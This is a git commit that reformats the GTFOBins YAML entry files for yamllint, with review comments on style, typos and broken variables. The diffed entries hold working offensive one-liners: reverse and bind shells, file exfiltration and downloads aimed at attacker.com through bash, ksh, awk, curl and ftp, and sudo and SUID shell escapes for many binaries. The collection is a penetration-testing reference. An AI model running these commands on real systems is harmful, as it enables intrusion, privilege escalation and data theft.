Fix YAMLs according to YAMLlint

Andrea Cardaci 2018-07-16 15:01:50 +02:00
parent 785126ede0
commit e1cd3aed68
87 changed files with 996 additions and 1061 deletions

3
.yamllint Normal file

@ -0,0 +1,3 @@
extends: default
rules:
line-length: disable
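Review bot: `line-length: disable` under `rules` switches the check off entirely, although the per-binary descriptions are the only lines in this repository that legitimately run long. Keeping the rule as a non-failing signal, `line-length: {max: 120, level: warning}`, would still surface accidental very long lines (a `code` snippet folded onto one line, say) without breaking the `lint` target. Whether that noise is wanted is a judgement call; the current form is at least explicit about the trade-off.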


@ -1,4 +1,4 @@
.PHONY: serve serve-public bundle .PHONY: serve serve-public bundle lint
serve: serve:
bundle exec jekyll serve bundle exec jekyll serve
@ -8,3 +8,6 @@ serve-public:
bundle: bundle:
bundle install bundle install
lint:
yamllint . _gtfobins/*.md
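Review bot: The new `lint` target lists `_gtfobins/*.md` next to `.` without saying why, and the reason is not obvious: when yamllint recurses a directory it only picks up files with a `.yaml`/`.yml` extension, so the Markdown front-matter files would otherwise be skipped silently and the target would pass while checking almost nothing. A one-line comment above the recipe, `# yamllint skips *.md when recursing, so the front-matter files are listed explicitly`, would preserve that intent for whoever next touches the target.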


@ -1,3 +1,4 @@
---
title: GTFOBins title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']


@ -1,3 +1,4 @@
---
execute-interactive: execute-interactive:
label: Interactive execute label: Interactive execute
description: | description: |


@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ash - code: ash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./ash" - code: "./ash"
sudo-enabled: sudo-enabled:
- code: sudo ash - code: sudo ash
--- ---


@ -1,34 +1,34 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: awk 'BEGIN {system("/bin/sh")}' - code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT; s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive: bind-shell-non-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
awk -v LPORT=$LPORT 'BEGIN { awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0"; s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
awk '//' "$LFILE" awk '//' "$LFILE"
sudo-enabled: sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited: suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh")}' - code: ./awk 'BEGIN {system("/bin/sh")}'
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
base64 "$LFILE" | base64 --decode base64 "$LFILE" | base64 --decode
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./base64 "$LFILE" | base64 --decode ./base64 "$LFILE" | base64 --decode
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode sudo base64 "$LFILE" | base64 --decode
--- ---


@ -1,55 +1,52 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: bash - code: bash
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_send
export LFILE=file_to_send bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` code: |
on the attacker box to collect the file. export RHOST=attacker.com
code: | export RPORT=12345
export RHOST=attacker.com export LFILE=file_to_send
export RPORT=12345 bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_get
export LFILE=file_to_get bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
bash -c 'echo data > $LFILE' bash -c 'echo data > $LFILE'
file-read: file-read:
- description: It trims trailing newlines and it's not binary-safe. - description: It trims trailing newlines and it's not binary-safe.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
bash -c 'echo "$(<$LFILE)"' bash -c 'echo "$(<$LFILE)"'
suid-enabled: suid-enabled:
- code: "./bash -p" - code: "./bash -p"
sudo-enabled: sudo-enabled:
- code: sudo bash - code: sudo bash
--- ---
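Review bot: The `upload` and `download` descriptions in this hunk were re-joined into single plain scalars well beyond 80 columns, which is only lint-clean because `.yamllint` disables `line-length`. A folded block scalar (`description: >-` followed by the wrapped sentences) yields the same string while keeping the file readable in a terminal, and the same applies to the equivalent entries in the ksh, nc, curl, busybox, make and nl hunks. This is a style preference only; the resulting values are unchanged from the two-line plain scalars they replace.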


@ -1,27 +1,25 @@
--- ---
description: | description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example. what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: execute-interactive:
- code: busybox sh - code: busybox sh
upload: upload:
- description: Serve files in the local folder running an HTTP server. - description: Serve files in the local folder running an HTTP server.
code: | code: |
export LPORT=12345 export LPORT=12345
busybox httpd -f -p $LPORT -h . busybox httpd -f -p $LPORT -h .
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
busybox sh -c 'echo "data" > $LFILE' busybox sh -c 'echo "data" > $LFILE'
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./busybox cat "$LFILE" ./busybox cat "$LFILE"
suid-enabled: suid-enabled:
- description: It may drop the SUID privileges depending on the compilation flags - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
and the runtime configuration. code: "./busybox sh"
code: "./busybox sh"
sudo-enabled: sudo-enabled:
- code: sudo busybox sh - code: sudo busybox sh
--- ---
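Review bot: The top-level description, which now begins on the `description:` line and continues on the next, still reads `GTFBins` where the project name is `GTFOBins`, and `Here some example.` is ungrammatical; the string is rendered on the site, so `what GTFOBins binaries are supported. Here are some examples.` would be the correction. Because the value is a plain scalar continued on an indented line, both lines fold into one string, so the fix is to wording only and does not affect the YAML structure.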


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cat "$LFILE" cat "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cat "$LFILE" ./cat "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cat "$LFILE" sudo cat "$LFILE"
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e code: crontab -e
sudo-enabled: sudo-enabled:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e code: sudo crontab -e
--- ---


@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: csh - code: csh
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./csh -b" - code: "./csh -b"
sudo-enabled: sudo-enabled:
- code: sudo csh - code: sudo csh
--- ---
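Review bot: The `file-write` snippet in this file invokes `ash -c`, not the binary the page documents, so the entry does not actually exercise `csh` and looks like a copy-paste carry-over from the ash entry; the same `ash -c` line appears in the dash hunk. yamllint cannot catch this kind of inconsistency, so it is worth a manual pass over the `code` values while they are being touched. If the other shell is used intentionally, a `description:` saying why would stop the next reader from flagging it again.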


@ -1,21 +1,20 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
the attacker box to collect the file. code: |
code: | URL=http://attacker.com/
URL=http://attacker.com/ LFILE=file_to_send
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
curl -X POST -d @$file_to_send $URL
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
LFILE=file_to_save LFILE=file_to_save
curl $URL -o $LFILE curl $URL -o $LFILE
file-read: file-read:
- description: The file path must be absolute. - description: The file path must be absolute.
code: | code: |
LFILE=/tmp/file_to_read LFILE=/tmp/file_to_read
curl file://$LFILE curl file://$LFILE
--- ---
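Review bot: In the `upload` snippet the variable assigned on the preceding line is `LFILE`, but the command references `$file_to_send`, which is never set and expands to an empty string, so the `-d @` argument is left without a file name. The reference should use the variable that was just defined, as the `download` entry below already does. This predates the commit but sits on the lines being reformatted, and the linter will not flag it.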


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cut -d "" -f1 "$LFILE" cut -d "" -f1 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cut -d "" -f1 "$LFILE" ./cut -d "" -f1 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE" sudo cut -d "" -f1 "$LFILE"
--- ---


@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: dash - code: dash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./dash -p" - code: ./dash -p
sudo-enabled: sudo-enabled:
- code: sudo dash - code: sudo dash
--- ---


@ -1,11 +1,11 @@
--- ---
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo "data" | dd of=$LFILE echo "data" | dd of=$LFILE
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
dd if=LFILE dd if=LFILE
--- ---
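Review bot: The `file-read` snippet reads `dd if=LFILE`, which passes the literal string `LFILE` as the input path rather than the value assigned on the line above; every other entry in this commit dereferences the variable with `$`. The `file-write` entry in the same hunk uses the variable correctly, so this is a typo rather than a deliberate form. Worth fixing while the file is being reformatted, since yamllint sees only a valid string here.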


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE diff --line-format=%L /dev/null $LFILE
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE ./diff --line-format=%L /dev/null $LFILE
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE sudo diff --line-format=%L /dev/null $LFILE
--- ---


@ -1,23 +1,21 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
ed ed
!/bin/sh !/bin/sh
file-write: file-write:
- code: | - code: |
ed file_to_write ed file_to_write
w w
file-read: file-read:
- code: 'ed file_to_read - code: ed file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo ed sudo ed
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: | - code: |
./ed ./ed
!/bin/sh !/bin/sh
--- ---


@ -1,17 +1,15 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")' - code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write: file-write:
- code: | - code: |
emacs file_to_write emacs file_to_write
C-x C-s C-x C-s
file-read: file-read:
- code: 'emacs file_to_read - code: emacs file_to_read
'
suid-enabled: suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled: sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")' - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: env /bin/sh - code: env /bin/sh
suid-enabled: suid-enabled:
- code: "./env /bin/sh -p" - code: ./env /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo env /bin/sh - code: sudo env /bin/sh
--- ---


@ -1,18 +1,16 @@
--- ---
description: 'The read file content is corrupted by replacing tabs with spaces. description: The read file content is corrupted by replacing tabs with spaces.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
expand "$LFILE" expand "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./expand "$LFILE" ./expand "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo expand "$LFILE" sudo expand "$LFILE"
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: expect -c 'spawn /bin/sh;interact' - code: expect -c 'spawn /bin/sh;interact'
suid-enabled: suid-enabled:
- code: "./expect -c 'spawn /bin/sh -p;interact'" - code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled: sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact' - code: sudo expect -c 'spawn /bin/sh;interact'
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: find . -exec /bin/sh \; -quit - code: find . -exec /bin/sh \; -quit
suid-enabled: suid-enabled:
- code: "./find . -exec /bin/sh -p \\; -quit" - code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled: sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit - code: sudo find . -exec /bin/sh \; -quit
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: flock -u / /bin/sh - code: flock -u / /bin/sh
suid-enabled: suid-enabled:
- code: "./flock -u / /bin/sh -p" - code: ./flock -u / /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo flock -u / /bin/sh - code: sudo flock -u / /bin/sh
--- ---


@ -1,18 +1,16 @@
--- ---
description: 'The read file content is not binary-safe. description: The read file content is not binary-safe.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE" fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE" ./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE" sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fold -w99999999 "$LFILE" fold -w99999999 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fold -w99999999 "$LFILE" ./fold -w99999999 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fold -w99999999 "$LFILE" sudo fold -w99999999 "$LFILE"
--- ---


@ -1,23 +1,23 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
ftp ftp
!/bin/sh !/bin/sh
upload: upload:
- description: Send local file to a FTP server. - description: Send local file to a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
put file_to_send put file_to_send
download: download:
- description: Fetch a remote file from a FTP server. - description: Fetch a remote file from a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
get file_to_get get file_to_get
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo ftp sudo ftp
!/bin/sh !/bin/sh
--- ---


@ -7,11 +7,11 @@ description: |
[version 3](/gtfobins/python3/). [version 3](/gtfobins/python3/).
functions: functions:
execute-interactive: execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit - code: gdb -nx -ex '!sh' -ex quit
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
sudo-enabled: sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit - code: sudo gdb -nx -ex '!sh' -ex quit
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
head -c1G "$LFILE" head -c1G "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./head -c1G "$LFILE" ./head -c1G "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo head -c1G "$LFILE" sudo head -c1G "$LFILE"
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ionice /bin/sh - code: ionice /bin/sh
suid-enabled: suid-enabled:
- code: "./ionice /bin/sh -p" - code: ./ionice /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo ionice /bin/sh - code: sudo ionice /bin/sh
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
jq -Rr . "$LFILE" jq -Rr . "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./jq -Rr . "$LFILE" ./jq -Rr . "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo jq -Rr . "$LFILE" sudo jq -Rr . "$LFILE"
--- ---


@ -1,59 +1,56 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ksh - code: ksh
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_send
export LFILE=file_to_send ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` code: |
on the attacker box to collect the file. export RHOST=attacker.com
code: | export RPORT=12345
export RHOST=attacker.com export LFILE=file_to_send
export RPORT=12345 ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 export LFILE=file_to_get
export LFILE=file_to_get ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ksh -c 'echo data > $LFILE' ksh -c 'echo data > $LFILE'
file-read: file-read:
- description: It trims trailing newlines. - description: It trims trailing newlines.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
ksh -c 'echo "$(<$LFILE)"' ksh -c 'echo "$(<$LFILE)"'
- description: It trims trailing newlines. - description: It trims trailing newlines.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled: suid-enabled:
- code: "./ksh -p" - code: ./ksh -p
sudo-enabled: sudo-enabled:
- code: sudo ksh - code: sudo ksh
--- ---


@ -9,9 +9,9 @@ description: |
``` ```
functions: functions:
execute-interactive: execute-interactive:
- code: "/lib/ld.so /bin/sh" - code: /lib/ld.so /bin/sh
suid-enabled: suid-enabled:
- code: "./ld.so /bin/sh -p" - code: ./ld.so /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /lib/ld.so /bin/sh - code: sudo /lib/ld.so /bin/sh
--- ---


@ -1,22 +1,20 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
less /etc/profile less /etc/profile
!/bin/sh !/bin/sh
- code: | - code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v v
file-read: file-read:
- code: 'less file_to_read - code: less file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo less /etc/profile sudo less /etc/profile
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: | - code: |
./less /etc/profile ./less /etc/profile
!/bin/sh !/bin/sh
--- ---


@ -1,7 +1,7 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ltrace -b -L /bin/sh - code: ltrace -b -L /bin/sh
sudo-enabled: sudo-enabled:
- code: sudo ltrace -b -L /bin/sh - code: sudo ltrace -b -L /bin/sh
--- ---


@ -1,17 +1,17 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF echo "From nobody@localhost $(date)" > $TF
mail -f $TF mail -f $TF
!/bin/sh !/bin/sh
sudo-enabled: sudo-enabled:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF echo "From nobody@localhost $(date)" > $TF
sudo mail -f $TF sudo mail -f $TF
!/bin/sh !/bin/sh
--- ---


@ -1,24 +1,21 @@
--- ---
description: | description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
All these examples only work with GNU `make` due to the lack of support of the
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
passing the content via stdin using `-f -`.
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND" make -s --eval=$'x:\n\t-'"$COMMAND"
file-write: file-write:
- description: Requires a newer GNU `make` version. - description: Requires a newer GNU `make` version.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
make -s --eval="\$(file >$LFILE,data)" . make -s --eval="\$(file >$LFILE,data)" .
suid-enabled: suid-enabled:
- code: | - code: |
COMMAND='/bin/sh -p' COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND" ./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled: sudo-enabled:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND" sudo make -s --eval=$'x:\n\t-'"$COMMAND"
--- ---


@ -1,19 +1,17 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
man man man man
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'man file_to_read - code: man file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo man man sudo man man
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: | - code: |
./man man ./man man
!/bin/sh !/bin/sh
--- ---


@ -1,17 +1,15 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
TERM= more /etc/profile TERM= more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'more file_to_read - code: more file_to_read
'
suid-enabled: suid-enabled:
- code: "./more file_to_read\n" - code: "./more file_to_read\n"
sudo-enabled: sudo-enabled:
- code: | - code: |
TERM= sudo -E more /etc/profile TERM= sudo -E more /etc/profile
!/bin/sh !/bin/sh
--- ---
